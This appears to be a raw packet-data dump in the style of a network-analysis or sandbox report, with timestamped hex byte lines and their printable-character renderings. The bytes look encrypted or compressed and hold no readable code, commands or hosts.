                                                                                                                                                    2022-09-29 12:59:08 UTC12009INData Raw: 1e ac cf 08 73 95 5c 23 20 a5 db 01 3b 98 84 42 aa 9e 70 c8 9c a8 a5 de d6 08 e3 28 8b 65 ba 2e 60 62 ec b8 42 43 03 13 18 93 d2 b5 a3 11 7a a1 85 e5 96 13 1e 4d 93 43 5c c1 39 77 59 59 28 e1 ea 24 90 96 a7 3d 7c 2c 49 20 cc 89 3c a3 b0 47 94 41 8b 82 e6 17 ec 0a 01 f9 26 73 11 ea 52 d3 c3 b3 23 2a 97 61 a3 08 2b fe be 6c 4e 32 dd e9 29 cb 7f 05 03 9c 36 0d 25 1b be fc ec 98 69 60 81 bd 0c c1 ec f6 53 52 a1 2b a2 f4 99 d5 f9 33 74 8e 4f 15 49 93 5b 65 c2 96 a4 32 ae 9a 2e 19 42 1f 0d 7f c2 46 20 0b 40 ed 95 98 a8 ff 13 8a ea bf 37 2a d1 ac 87 73 73 a3 f5 19 1e ef 3e a5 0c 06 c1 4e 12 6d 33 78 c2 d3 ff 6f 2e 0a 04 2a 2a d5 a9 36 8d de 19 11 02 07 4d 07 6f 19 d0 41 97 15 47 76 b7 b4 6b 54 3a 42 cf e3 56 5c dc 5b 75 8c b1 ca 36 1c 12 20 08 e6 b3 b6 c0 f6 2e
                                                                                                                                                    Data Ascii: s\# ;Bp(e.`bBCzMC\9wYY($=|,I <GA&sR#*a+lN2)6%i`SR+3tOI[e2.BF @7*ss>Nm3xo.**6MoAGvkT:BV\[u6 .
                                                                                                                                                    2022-09-29 12:59:08 UTC12010INData Raw: ac 43 2f a2 90 f0 31 90 f4 64 d2 ad 64 7e d3 7a 52 03 98 51 5f 4c 3e 3b 9d 64 51 19 57 c8 8d 75 ec a6 11 e6 36 43 ba 68 f3 45 3a 90 5b da 25 cf ca 35 d7 d6 dc f2 82 45 32 12 0f a0 13 f3 1e c0 46 7d 6e 18 bc 45 6a 23 85 eb 55 2f 5c ed 44 86 e5 7d 7f 3c c3 95 77 de ac cd b1 6e b1 cf c3 ef 36 8b 4f ae 72 08 c8 c4 98 c1 de cc 7e af 7c cc d6 dd 4b cc 87 db eb 52 41 ea aa df 57 09 c0 22 ae c8 62 b5 15 e5 24 4b df 86 9a 5e a4 dc d1 0c 4c dc b9 fc c3 07 40 fe ac 1d 94 f3 f7 df c4 4a a3 de a9 a2 a4 ce c3 d6 4c 0e 5e 5d 0c ed 5f 97 59 fe 3f 6b f4 0f 90 44 98 1b 26 48 a4 ff d5 f8 7e 02 1e 88 1d 00 c4 f9 3f 5e 17 95 33 69 39 0e 47 1c de f3 47 cb f4 7c 39 21 59 fc 1d 14 fe ea a0 9e 40 3c 90 83 b1 e9 70 fc fb 6a 6a 15 56 6f c9 1b bc 73 78 23 e5 9c 25 9c 80 61 0b a6 9e
                                                                                                                                                    Data Ascii: C/1dd~zRQ_L>;dQWu6ChE:[%5E2F}nEj#U/\D}<wn6Or~|KRAW"b$K^L@JL^]_Y?kD&H~?^3i9GG|9!Y@<pjjVosx#%a
                                                                                                                                                    2022-09-29 12:59:08 UTC12011INData Raw: 58 a6 6f b4 b3 b2 32 c5 1d 5c 93 dd 85 fa 61 51 19 8f 8a e9 8a 7f bc d3 17 bf cc 5c 62 74 e7 3f 0f 19 95 91 7a f0 80 29 db a0 3f 13 1c 12 5a 76 54 c3 82 ba 0a 63 7d 71 31 a4 21 20 fb c6 97 5c 25 b2 be a7 e6 d3 50 28 1d 4a 20 b2 5c 11 1f 00 f4 6c 0b c0 dc 02 79 0f f6 70 5a 26 8f 1e 32 89 1e 1e 7c 52 3f 27 93 43 2a ad 4f e5 56 4c 09 0d d1 4f 47 4f 6b 7b 96 2d 6a ff 95 80 12 6a 78 9c f6 7a fc bf 77 14 cc 3e cf aa 64 8a e0 4c 0c dc 20 18 01 a5 b6 62 fa bb fe 32 86 35 0e 5d 93 08 87 ab 8c 07 3f 15 00 94 2e d8 52 8c 02 bf 48 9a c4 76 33 41 29 6d c5 d3 0e e1 0a 01 5f 97 69 9d d8 a1 48 22 28 64 9d d6 3a 88 38 2e a7 2a d2 41 01 64 f4 f1 82 70 d4 7a d9 8e 8d ab ec d4 fd 58 81 2e 6e e3 af 22 a8 e8 bb d3 ad cc db 36 26 3b 3d 72 82 e4 2e 9b 8e ec fd 2e e7 d4 6d 8d 3c
                                                                                                                                                    Data Ascii: Xo2\aQ\bt?z)?ZvTc}q1! \%P(J \lypZ&2|R?'C*OVLOGOk{-jjxzw>dL b25]?.RHv3A)m_iH"(d:8.*AdpzX.n"6&;=r..m<
                                                                                                                                                    2022-09-29 12:59:08 UTC12013INData Raw: a6 e2 2e ac 4a 78 04 36 8f 2c 37 5c cb 4a 01 d5 6a 23 a3 ff e4 b8 b6 c3 45 cb 06 1e 1a 8b a8 09 33 61 8c 3f 17 6a f3 80 a3 40 76 50 4b 16 2b 50 05 4e a6 e4 ee 96 6f 8f 0e 92 41 0d 1c 49 6c ae d7 36 75 3d 5f bd 47 e2 f4 5f ea 96 9c c7 09 5d 56 a6 e3 4d f5 53 94 cb c2 2b 96 98 0e 46 cd 3f 9f 36 48 da a4 a4 77 f4 ac 22 e0 07 ba b2 f1 44 99 ed 6d fd e8 04 de 58 51 0f 28 f3 c0 33 ab c9 43 c2 96 18 d4 fa 80 1a 07 cb 9b 26 00 fa d4 59 98 46 24 ce 27 0c c2 ec d1 a8 8e f3 57 f7 ab b2 cb 8a 20 22 77 4c 51 10 8d e1 ae 9f ba 71 23 e8 81 a1 58 8d 11 a8 9b d6 85 0a db d8 02 9c 43 e5 45 bc ad 73 ec 82 29 ae 64 82 ca 42 65 ce 94 04 d6 76 e3 d6 07 15 ed ba 48 94 5a 5b 18 41 81 38 80 bf bd 3d e3 7d c0 93 a1 9f 42 3a 78 d0 05 23 0e ac a4 b5 46 cb e9 30 f4 70 44 b4 38 0f 8f
                                                                                                                                                    Data Ascii: .Jx6,7\Jj#E3a?j@vPK+PNoAIl6u=_G_]VMS+F?6Hw"DmXQ(3C&YF$'W "wLQq#XCEs)dBevHZ[A8=}B:x#F0pD8
                                                                                                                                                    2022-09-29 12:59:08 UTC12014INData Raw: 00 19 df e4 2b 56 05 42 2d 7f 06 0a cf e6 b0 16 40 0f 72 65 c0 59 55 3d 81 b6 78 fb ef 52 c3 6b 1b c6 04 16 39 fe d7 b2 04 0f b9 72 a7 ec f3 c4 7b e0 00 95 12 df 45 3c b1 9c 98 f3 5d 8b 52 9f 1a 4e 15 7b c2 ae 39 75 96 96 9b 19 c3 ab 81 62 8a d5 c5 a5 da 9e cf 40 43 0a 49 47 12 69 31 da fe 57 c4 3b f1 92 4d a8 8c d7 60 e2 29 50 e4 4a 95 27 0b 19 0d 75 b5 7e 1a 03 66 85 cc 14 c2 47 4b 33 e8 c5 57 99 1a f9 57 a6 4d 38 c4 f6 a3 0f 1a 96 a9 fb 8d ea 1e 5c bc e0 d6 df 32 5c 6c a1 c9 01 cf 99 ea 14 71 c3 33 7c b7 ae 34 21 2f 82 13 39 02 d8 28 ed b3 2a 2b 98 2f 93 d8 cb 04 0f 47 0f 2e 17 32 d2 b5 b8 9f b4 73 0c 3d 79 6a 4d 16 d2 73 2d ee 9b 42 9e 8b 68 59 49 72 b5 f5 87 38 5d 80 dd cb d7 25 5b 90 49 2a 3e 68 ee 6d c2 19 66 84 a8 d2 ea 7c 01 e2 49 3c 90 4c 9d 12
                                                                                                                                                    Data Ascii: +VB-@reYU=xRk9r{E<]RN{9ub@CIGi1W;M`)PJ'u~fGK3WWM8\2\lq3|4!/9(*+/G.2s=yjMs-BhYIr8]%[I*>hmf|I<L
                                                                                                                                                    2022-09-29 12:59:08 UTC12015INData Raw: fa 62 b1 84 fb bb e5 1b ed a8 6e 7d bd 10 db 51 31 5b d4 ae 56 17 20 de d6 d3 88 cf 52 dc 44 7c 86 38 f2 5f 12 b2 15 97 e2 82 3f 35 4a 0c 86 9d ac ff bb fe 0e 4f de b2 8e 01 b7 91 f5 3d 0c 4c cd 21 4d 32 39 50 82 ce 54 3d d3 1c 25 3e 13 64 a7 c3 7b 18 ed 9d fb fe a9 c1 11 7f 09 99 59 ce c0 be 3d 9c 16 3a 2c ad e8 bc 69 86 a0 c1 fc 8d d0 06 6b 26 0a b9 24 68 5d 76 ec b1 1e 00 d1 43 53 41 9a 68 8a f8 8f 11 4c a9 2a 6c 27 c9 a7 0d b3 77 ac aa f2 07 99 5b e1 c8 76 43 b6 24 f1 d0 8d 3f 69 36 37 fa 2a 11 5b 1b f5 79 0f c9 a4 1e 33 29 48 a0 ce bd 12 d6 01 c5 2b 99 80 57 03 90 63 02 4d 55 da 27 37 57 55 41 e3 99 f0 c3 03 d4 0c 65 9c bb b6 35 b1 31 ca fa 0d 24 1d fa 95 2c 65 05 da 6f 30 5c 12 df a2 c0 5d 45 68 3a 92 86 a2 ff 1d 90 29 eb 84 a8 3c 84 c2 09 f6 b8 38
                                                                                                                                                    Data Ascii: bn}Q1[V RD|8_?5JO=L!M29PT=%>d{Y=:,ik&$h]vCSAhL*l'w[vC$?i67*[y3)H+WcMU'7WUAe51$,eo0\]Eh:)<8
                                                                                                                                                    2022-09-29 12:59:08 UTC12017INData Raw: ab f3 b2 67 e5 e2 c9 1f 70 e0 7c b5 59 b8 0d de 9f dd c6 80 b6 2d 74 d9 7f 1a 05 6f d6 2b ac 62 44 4e 63 23 00 27 69 cb 29 06 2d 66 27 a0 d2 54 1a b9 9e 81 a4 80 64 d3 f9 f7 d7 cd 51 b5 18 8b 53 9f c6 5a 97 da b3 10 69 2f 18 d6 f2 9d 2a db d9 47 8e e0 a2 7b 8b 9d f0 9c 74 1f bf 45 ca 29 14 94 0a 67 d7 3e 97 ec d6 fb d4 99 9a f2 5d 61 39 da c9 d8 8f 30 85 28 95 ea a3 a4 2e 46 e3 b0 01 5d bd 43 93 80 e4 5d c2 28 1c 77 60 55 62 3e 38 69 5c 68 5d 46 48 6e e3 d3 29 15 ba e2 83 29 3e dc a1 9d 9a 16 0d 1e c4 f8 b2 45 df 8f 14 9a 41 2c 76 b0 3c 1c 70 1a f0 41 c2 a1 9d 10 2c 8c 38 7f ce ff 19 94 b1 ef c3 8f 63 36 3b d1 e4 1c fe 9b 16 18 e6 60 8e 6b 6c 24 e3 b1 c5 cf b2 b6 db 63 09 d0 56 be fa 89 da af 35 dd e3 75 0d 58 8e 5d be b8 a5 47 e2 50 1e c2 0a fe 6a 15 29
                                                                                                                                                    Data Ascii: gp|Y-to+bDNc#'i)-f'TdQSZi/*G{tE)g>]a90(.F]C](w`Ub>8i\h]FHn))>EA,v<pA,8c6;`kl$cV5uX]GPj)
                                                                                                                                                    2022-09-29 12:59:08 UTC12018INData Raw: 9e c4 23 55 12 24 a7 12 02 48 ed 07 3e 34 0e 43 40 da 49 94 fd 46 15 6b 79 90 b6 90 af 07 b6 a6 5c 2e 0c 77 43 2e 73 0f a2 69 b7 64 78 f5 b0 c4 de 29 2b 33 2a 8b d6 6e e8 ba 13 4f a6 c2 78 62 50 1d a0 07 43 f4 de 48 89 2f 20 aa fd b1 53 21 be 07 c4 f4 5f fa ed 58 b2 aa 07 a1 3b e0 59 8c 65 a9 40 da 10 3e c5 fa 16 c4 65 33 dc 4e e9 bc 8e de 04 07 f1 98 41 1f 5d 7e 89 72 e1 e4 0c bc 9f 76 68 49 9b 1d e2 24 b8 2a 75 cd cd 0e 8d 91 fa 79 18 64 6b 70 18 73 03 5e 40 e6 8e cb 00 13 24 d2 64 17 bf b5 37 d6 c1 05 56 46 2d d8 d7 d6 e2 1c f3 97 92 7b 29 5a 2d 15 ee e3 a1 5b f3 4b cc 97 ff 64 e3 d0 6c c9 13 db 6a 91 c1 0a 14 ea ba 24 2b a0 11 95 c2 1a 82 f0 b4 be aa f7 3e 2b 88 66 35 cd 77 6b 07 13 92 ff 41 59 b5 9e eb 72 e4 f6 c3 fe 34 5b 0c 31 2e df b9 6a 6d 28 25
                                                                                                                                                    Data Ascii: #U$H>4C@IFky\.wC.sidx)+3*nOxbPCH/ S!_X;Ye@>e3NA]~rvhI$*uydkps^@$d7VF-{)Z-[Kdlj$+>+f5wkAYr4[1.jm(%
                                                                                                                                                    2022-09-29 12:59:08 UTC12019INData Raw: 38 07 55 91 f3 d6 36 13 d1 8d 0e b3 8d ed 0c 36 0a e7 9f a2 6e f9 53 0c 9b 99 b2 01 3f 04 e5 88 85 7c 5d 59 d0 67 f4 53 97 ed 03 42 f0 f9 99 2f 5a 50 f2 ef 9a c1 8b 2d 3d ed d8 3d e9 17 b3 95 58 fc 93 c7 ee 4e 08 37 18 ed 1f 42 5d 02 4c 94 e7 77 e3 3c 07 a4 af 05 0b c0 a3 1b d2 ac a8 94 8d 1b aa cf 6a 29 c6 cb d3 fd 91 57 3c 9a ec b3 5c 31 e5 ac ee b8 49 a0 7e d1 40 a3 cf 46 7b 8d 57 b3 d7 6b 7b 1f ad 84 9b 81 a4 37 c9 41 03 fb ac 7b 0e ce 08 0a d4 63 ed 6d 5f 12 2c 72 12 0f e6 ff 83 47 08 23 30 b7 52 a0 a7 af 18 af f2 44 22 92 45 aa fd 23 20 3b cc af 74 23 bb 45 f5 4b 54 12 21 77 3a 39 52 b9 22 90 f4 bd 72 cc 59 2b 3c 1d 6b 7a 11 28 c9 02 86 e5 b3 91 26 99 5f e3 c7 44 b7 61 f3 04 41 cd 8e ca e7 ef 0c 04 65 30 aa 49 08 49 9e 0b ad 77 de ee 4a 8a 37 fa de
                                                                                                                                                    Data Ascii: 8U66nS?|]YgSB/ZP-==XN7B]Lw<j)W<\1I~@F{Wk{7A{cm_,rG#0RD"E# ;t#EKT!w:9R"rY+<kz(&_DaAe0IIwJ7
                                                                                                                                                    2022-09-29 12:59:08 UTC12021INData Raw: 0d a0 75 8c fd 8d cc 9f 2d 8b 08 d8 61 e9 fc 2b 5e 70 43 b8 b1 11 b5 40 41 16 04 eb 9f a9 28 01 21 32 28 39 dd 2a 0b e8 3c 6f e4 26 a2 ab 45 94 dd f7 6e db ab 7a 2b 1d 48 a6 83 94 18 0c 25 9b e5 fb af da 93 c0 3c 93 6b b1 0a df 61 69 ee ca 76 1f 3e bd 6f 9b f7 a4 ab 3f 1e fc 82 b4 ec 62 26 ca 94 26 1a c1 3c 65 45 6c 37 d2 02 4e 08 19 67 3a 67 a3 97 b5 e5 a4 82 1c ab b5 20 2b eb a1 85 d0 d9 0d 4f bb a0 e6 a5 89 21 b3 7e 9c 30 79 cd 03 68 97 b9 7e 4c 9e 99 24 a4 b8 1d 89 3e 7e c4 4b cd 3d 84 41 76 99 ca 2e 2d 00 10 2b 43 d9 bf dc 41 04 07 e8 2a 8f 3f c9 cc 8a 1d 1c fb 45 0e 12 11 23 ea 7c 87 ab dd ba 67 fe dd c3 e2 f0 98 1f d7 28 8e ec 57 03 8e 72 65 95 c8 e2 4f 18 34 ae 19 26 93 79 18 e4 2e 8a 53 dd 74 2e 7e 0b 6d 1f 0b d1 76 c1 2a 6d ef b1 a0 65 84 33 05
                                                                                                                                                    Data Ascii: u-a+^pC@A(!2(9*<o&Enz+H%<kaiv>o?b&&<eEl7Ng:g +O!~0yh~L$>~K=Av.-+CA*?E#|g(WreO4&y.St.~mv*me3
                                                                                                                                                    2022-09-29 12:59:08 UTC12021INData Raw: b4 be 66 ec 13 a3 26 df 89 3c ed a2 81 08 fb f7 8b 58 35 ed ec a7 25 20 1d 90 a4 79 64 57 b8 b8 c5 a8 3a 5e 63 69 e0 a2 62 df e4 6c 9d 19 56 8f 30 bd d7 d8 0b 64 1a 28 2f 6d 45 3c 08 69 73 cc f1 f9 f7 b1 97 63 6d cd e3 5e ba 11 bf ab 1d 98 88 37 c8 08 62 3b a4 10 43 bf 13 eb 4a 12 08 a8 b6 d9 86 f6 75 7e e5 46 f9 02 9b 9d a4 08 b6 3a aa e5 af 6f 05 37 ed 2b 03 f1 a1 1a ec eb fe 8e 8d 14 16 d1 46 8a 40 8d 44 3a 30 c2 8b 02 89 75 38 29 e9 c6 4c c7 5f 0d 72 9e 85 1e 23 9e df 6a fb 22 0c e9 fe f0 d8 80 52 f1 54 d0 c5 23 d4 9e 41 89 98 ed b2 be d0 7f 07 93 5c cc 1e 81 63 e7 2f 75 c9 a7 ab 19 6a 5f f7 1b 08 9c 02 91 d9 5d 6e 4d 41 c1 87 62 cf a8 e5 8f 5c 86 2d 9b 0e 6d 5c ad 72 21 75 58 9c 52 fd dd 6c fe ea a9 02 83 e2 7e 5d bd 8f 3c 2d 87 57 36 dc 45 ae 56 2a
                                                                                                                                                    Data Ascii: f&<X5% ydW:^ciblV0d(/mE<iscm^7b;CJu~F:o7+F@D:0u8)L_r#j"RT#A\c/uj_]nMAb\-m\r!uXRl~]<-W6EV*
                                                                                                                                                    2022-09-29 12:59:08 UTC12037INData Raw: 70 85 fe 40 02 51 a2 3e 81 ae de 1b 1d 21 9b 9e 20 f8 46 91 16 32 5b a5 a7 93 41 39 43 4a 58 04 cf e8 e5 4d cc 27 89 40 8a 9e 1d 84 66 81 3b 8b fe e5 0b 0d 24 cb 12 96 b3 fc 9e 2d cb 40 e9 4c 83 55 24 18 44 50 48 20 9a a2 c1 c0 4a 7b e7 16 fe 32 8f e9 fb 59 76 87 48 97 f2 ac 4d 15 16 b6 15 aa 70 ac 23 97 e6 8d 77 0f de 90 55 ca d4 60 61 ba ab 82 b3 20 a4 f6 ff 20 5f 94 42 2e 2a 2e 82 1a 48 f5 64 7f 5b e0 86 07 ac 37 3c 7f 56 a0 0d bf a8 7a 41 a2 7b 4e df be 7a 53 a0 68 2a bc ce d9 9c f4 8a 51 45 c6 b9 48 36 ae c0 af 25 2d 16 d1 12 a5 c0 6e 12 0d c5 60 58 d7 99 94 1d 43 7c bf 4c 14 68 20 68 46 24 d7 5b 22 78 60 98 69 19 a2 37 8f 64 75 8d 58 1f b9 ed c3 ff cd f3 fd 68 96 19 8c 20 b5 db 8d b1 66 ed 6c a0 04 fc 31 ab 22 45 6e 27 36 8a e2 0c 49 c9 c6 9a 84 fd
                                                                                                                                                    Data Ascii: p@Q>! F2[A9CJXM'@f;$-@LU$DPH J{2YvHMp#wU`a _B.*.Hd[7<VzA{NzSh*QEH6%-n`XC|Lh hF$["x`i7duXh fl1"En'6I
                                                                                                                                                    2022-09-29 12:59:08 UTC12053INData Raw: 2b 99 83 4b 97 da 58 ec 15 c1 84 6d f7 39 3e 56 26 56 af 98 8d 8d 87 b8 1f fa fd 82 dd 32 e7 52 ba 35 a1 7f 76 e5 bf dc 13 5b 4f e9 9c b0 01 f5 f7 98 45 ab e9 29 1f f7 33 11 0d 1f 46 2a cd 3c 85 01 6a 2b c5 6e 90 9e 05 6c 9d 0d af 26 eb d9 40 05 fe a6 67 0f 8d ed 7f a4 39 c3 95 a6 26 f0 32 b4 fa 41 52 02 f6 cc c5 4f 6e 70 f5 a9 3d 68 82 e1 3d da 4c e4 52 aa c2 a0 21 bf a4 81 83 80 05 99 02 3b 5a 58 18 c9 61 4e 13 8e 62 26 cc ed 4e 61 17 34 f4 c6 ff 04 f9 9a 12 7c 1b eb 9f 94 0e 6a 02 c0 21 e7 15 26 c3 34 04 d7 f6 b2 56 40 48 d9 d5 8f 74 b0 b8 1a f3 d2 51 57 b5 62 94 95 b6 60 95 ae f3 b2 04 67 02 7b f0 bd dd c3 62 94 79 e7 50 3b e5 57 a4 3b 60 d1 fe ec f7 03 4b fd 52 80 c5 51 f9 ac f2 27 b4 75 48 2b c9 89 5f 66 75 bd e3 d3 ef d2 e3 cd 49 67 fd 6a 84 4e ab
                                                                                                                                                    Data Ascii: +KXm9>V&V2R5v[OE)3F*<j+nl&@g9&2AROnp=h=LR!;ZXaNb&Na4|j!&4V@HtQWb`g{byP;W;`KRQ'uH+_fuIgjN
                                                                                                                                                    2022-09-29 12:59:08 UTC12069INData Raw: 8c c5 dd d7 5f 28 68 12 bd 1a b2 88 58 45 eb c1 c6 c5 64 80 9c e7 26 f6 ed 6e 86 58 2b ac 1e 38 dc 3e b5 d9 84 5e 8a 6d 8c ba 2a 7e ad d2 a7 06 f7 ce 1f bb e7 aa b0 c5 8a b2 9e b8 66 3f b8 e0 bb 8f 41 bd 70 b0 10 e1 32 a1 03 6d 84 4d 8f 02 8c c0 66 f0 3d 3a 0e 3a b8 8b f3 ff 2f 5a 0d 47 c5 b5 b6 2c 4e df 57 0d 89 9a 5d cd 43 c8 5f 0e d3 03 82 50 e8 70 1a 14 14 f4 d5 b6 5b 00 f7 bb f3 89 1d 55 d3 ce d5 aa 3e dd 8f ec db 03 19 1f 50 cc 3c 87 19 c3 a8 2b 28 1b ac 59 46 30 14 2d d8 1f 02 6f f8 1c c0 5b b6 d8 60 08 9a c8 12 58 3c 41 22 94 5d 7e 3f 79 30 54 4b 0a 7d 1d 4a df 4f c5 d3 03 26 93 88 e5 43 5e 31 29 08 44 06 01 bf 52 28 56 4b 0e ea 4b db de 1b 54 5c 91 63 31 bc 24 7a d2 e9 3e 8f d2 bc 8a a6 02 e6 8c fc bf 6f 29 52 4e 25 ce f6 d5 78 37 3f 67 14 99 54
                                                                                                                                                    Data Ascii: _(hXEd&nX+8>^m*~f?Ap2mMf=::/ZG,NW]C_Pp[U>P<+(YF0-o[`X<A"]~?y0TK}JO&C^1)DR(VKKT\c1$z>o)RN%x7?gT
                                                                                                                                                    2022-09-29 12:59:08 UTC12085INData Raw: b0 87 fb 6d ac 3f 05 7c 89 cc 96 95 cc 98 d5 a1 f1 17 d5 50 72 77 4b 18 61 2e e9 12 2d b2 e4 26 58 84 31 b2 07 49 e5 91 ea e7 6e 35 78 0b 35 22 c2 be 7c d0 f5 1c 13 93 4d 62 0b 3a 85 a0 4f c0 fe 63 15 44 69 cc 1d 1e d0 ef 9e 7a a2 c1 00 70 3b 28 26 1d a8 52 a6 45 e6 e2 15 94 30 38 4a 17 28 30 db 96 a1 22 68 2b 56 e6 00 e0 d7 4e 8f 2c 08 d1 94 5d a4 be 79 4b 16 b5 dd d0 46 c2 6d 1e b7 d7 b2 26 b8 6c ec 0c b0 be 99 d0 b5 06 77 81 f2 af 72 dc fa 1b 7f cc 6e 08 09 0c 32 17 35 ba 04 57 b6 ee 66 fc 85 07 a8 c0 48 76 05 58 d8 d6 38 fd 33 60 f0 dc 5f af cb f0 5a 03 79 3a 52 6c e3 43 71 7d 9a 03 cf ed c0 04 1d b3 b9 f8 e5 56 56 57 99 ef 32 1a e7 9e c3 77 b4 06 27 93 87 b4 f4 74 d6 e8 46 d6 02 bc b6 e9 10 5c 9a bf 72 42 64 42 8e c0 c7 09 0e 1f b3 28 7a 62 b3 b9 20
                                                                                                                                                    Data Ascii: m?|PrwKa.-&X1In5x5"|Mb:OcDizp;(&RE08J(0"h+VN,]yKFm&lwrn25WfHvX83`_Zy:RlCq}VVW2w'tF\rBdB(zb
                                                                                                                                                    2022-09-29 12:59:08 UTC12101INData Raw: e6 9b 97 db 79 dc ed 1e 59 d7 9d 72 93 10 e0 ff ea 07 52 b3 ca 91 53 70 5c a0 8c 36 f0 7d 75 c0 b5 97 f2 85 7f 33 db 3d f9 4a 0b e5 a8 fa b0 5d b7 11 64 2b d4 31 f4 82 8b 69 22 d2 1f 0d 13 96 a6 34 5d 36 9e 31 50 1f 7e cd 6e 0d 85 c0 d9 48 92 9c b1 83 0f b6 8d 30 9e 16 ef 73 2f 0b e0 92 9a 45 f2 3f e6 21 40 78 2b bd e1 8c e8 45 96 5c 11 a4 12 7a 9d 32 be f6 ef d1 5f 9b 48 f3 d8 70 eb 52 28 f6 14 9e 8e 19 be 4b 5a 1c d1 c7 b1 17 e4 c3 b4 b0 aa 5f 4c dc 77 22 86 8e 61 59 55 72 5a 4a af 81 dd 18 10 7a ac 1b 61 36 ab 6c 5f e0 03 76 74 95 38 e9 41 b6 a6 39 18 b1 b2 87 50 c4 5f 28 db d3 3c e5 2b b2 ed 07 bf 16 08 27 e1 bb dc 3a 0a 91 fd 6d a5 90 e1 ba d6 b3 ee 9a bb 3b c0 69 e6 80 9d bc 03 6a 6f 65 c4 8f d6 e1 24 82 c3 1b 30 44 4f 24 d2 6d 3e 49 0d 0a af 04 52
                                                                                                                                                    Data Ascii: yYrRSp\6}u3=J]d+1i"4]61P~nH0s/E?!@x+E\z2_HpR(KZ_Lw"aYUrZJza6l_vt8A9P_(<+':m;ijoe$0DO$m>IR
                                                                                                                                                    2022-09-29 12:59:08 UTC12117INData Raw: 32 c5 d7 62 65 85 0e 5b 65 27 10 bb ff 25 a2 fd d4 ef 18 40 a2 d1 bf 49 2e 87 b5 34 b9 5a 4e d8 23 8d 53 44 6f f8 ab 0d 23 f5 b3 6f e9 70 d0 af 60 a9 f8 9e fb 2f 7f b2 c0 9d d6 5a a2 56 24 e7 18 97 4c 6c 78 f7 5d b6 97 9c 45 1f 91 3c c6 03 31 5b 69 4c 0a e0 9d c7 78 16 b2 5f f6 6d 14 25 de 1c a5 ae 07 a9 08 3b a9 09 f0 74 be ab 6e 19 02 f3 14 b3 7c d3 a4 fa 85 7e 58 7a f8 a3 f7 69 8d 63 f3 02 93 c6 1f e9 0e 6e 01 eb cd 1f a6 ae d1 25 5c 8c 78 3e 3d a1 3c c3 ac 15 24 71 ed 74 19 72 81 e7 29 4a 0b a3 eb 35 ef cf 31 39 d2 8a d0 7e 57 d3 e9 81 eb 6b 01 a7 db 94 08 a4 7e 47 d1 d3 a4 38 09 55 38 da 8d 2b 9d 5e c1 32 65 d0 05 db b8 49 10 f1 19 16 15 b1 f2 2e 36 50 b1 de 27 f7 ac 3d ba 15 6a 9b ba a3 78 6c b4 19 1c f3 4e 53 3a 03 26 ad 9b db 66 95 85 d4 9b d8 07
                                                                                                                                                    Data Ascii: 2be[e'%@I.4ZN#SDo#op`/ZV$Llx]E<1[iLx_m%;tn|~Xzicn%\x>=<$qtr)J519~Wk~G8U8+^2eI.6P'=jxlNS:&f
                                                                                                                                                    2022-09-29 12:59:08 UTC12133INData Raw: de 54 c0 80 8b bd 78 d1 fd 54 a2 5d c2 37 01 c3 b5 6b 21 76 5b ce 46 ae db 43 92 2f e8 46 95 0a 9c ce be 36 1c dd 9b 56 05 48 91 d6 17 fa e9 2e e0 f6 52 e2 85 4a 62 f2 e4 02 b1 16 04 a4 0b 5d b6 63 0b 13 0f 8f d5 ef 46 49 cb a7 9e 0f a0 8c 8f 31 84 34 ae 1b 42 77 d5 5c de 3f 07 e6 a6 b6 c5 8d d9 4f 5b 43 5e 0a 20 76 01 f3 30 ae c9 dc 7b 37 25 39 27 2a a2 01 84 52 fd 23 e2 be 07 c6 78 3d 4d 0d 02 13 88 03 de cf 10 8b 22 15 8d da 63 70 8c 5f be ab 35 ef 80 f3 6c e8 8f e3 52 a8 4a 2f f5 c8 e4 50 7a fe 8a 7d 62 9e 68 95 da 09 9c 9d 4c b5 fd 0a 70 82 1f c9 51 34 52 16 8d 78 05 77 58 b4 55 91 93 c7 66 1b e9 cc fb 4a 97 a5 1e df 59 f0 2a 6f 5b 1f 14 df fa ed 82 0e 86 e4 3a 8a a9 2a 82 b7 6c 83 73 41 5e 65 61 66 c9 da 93 ec 3b df a7 63 83 95 df 12 f4 01 d3 03 a6
                                                                                                                                                    Data Ascii: TxT]7k!v[FC/F6VH.RJb]cFI14Bw\?O[C^ v0{7%9'*R#x=M"cp_5lRJ/Pz}bhLpQ4RxwXUfJY*o[:*lsA^eaf;c
                                                                                                                                                    2022-09-29 12:59:08 UTC12149INData Raw: 4a f0 33 76 30 c4 41 a9 1d 00 c7 09 dc b5 c2 b3 a5 ec d0 a3 f9 95 24 ac 13 25 b9 e8 83 c7 2c 30 17 68 1a 99 e6 af 91 d8 52 5f 85 b3 40 7d bf 51 5c ac c7 df b2 49 a0 b7 f4 ca 2b 5a 1b 47 74 6a db 5b c4 f7 f2 56 a3 86 32 92 af b4 20 3f 61 31 46 a5 47 d9 47 6f 55 df 9c 96 d1 c4 38 0e 9a 34 ba 16 25 24 6b 22 25 53 e3 d1 4d 38 fb e4 6f 69 79 b7 b7 67 2e 85 09 7b 17 f0 9c d2 b2 99 6f 97 b3 94 08 83 6b 56 0b 93 71 4e 2d c5 65 d1 3f 24 cd 39 00 9b 82 f5 69 de 74 f7 f6 bb 2c cf 30 04 a4 64 93 54 bb 6e 6b 66 14 4b 5b 68 e6 cf 63 20 89 18 c9 b7 5e ec 2a 9d 43 ba b8 cd c5 9e 06 83 3a b6 0a 9b 8a 9d ca 86 e4 f5 e5 2c 8e c5 a0 ff cf f9 4a 3a 3d b8 19 4b 77 0c 33 46 7a 62 0d b9 81 de 0e 0f e6 16 d8 b1 30 91 c2 22 fa d5 b4 fb aa c1 5f 5e 6c d0 fa e8 11 37 7c 6a e9 f3 69
                                                                                                                                                    Data Ascii: J3v0A$%,0hR_@}Q\I+ZGtj[V2 ?a1FGGoU84%$k"%SM8oiyg.{okVqN-e?$9it,0dTnkfK[hc ^*C:,J:=Kw3Fzb0"_^l7|ji
